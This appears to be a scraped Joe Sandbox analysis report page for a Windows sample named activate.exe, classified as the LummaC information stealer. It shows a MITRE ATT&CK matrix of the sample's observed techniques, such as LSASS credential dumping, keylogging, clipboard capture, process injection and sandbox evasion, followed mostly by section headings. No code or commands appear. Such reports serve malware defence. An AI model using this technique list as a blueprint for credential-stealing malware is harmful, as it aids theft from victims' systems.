Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	221 Virtualization/Sandbox Evasion	Remote Desktop Protocol	31 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report activate.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
activate.exe